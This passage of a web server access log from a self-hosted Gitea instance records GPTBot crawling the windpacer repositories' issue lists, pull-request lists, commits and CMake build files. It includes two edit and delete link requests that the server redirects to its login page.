"/windpacer/windpacer/issues?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15653] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15650] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:17:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" -[17/Feb/2026:17:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17054] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:17:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10134] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:17:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17056] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:17:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15651] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=all&type=all" [Client 74.7.227.38] [Length 9911] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:17:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" -[17/Feb/2026:17:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:17:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 11078] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10025] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:17:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:17:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17058] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11116] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:23:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:23:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10116] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 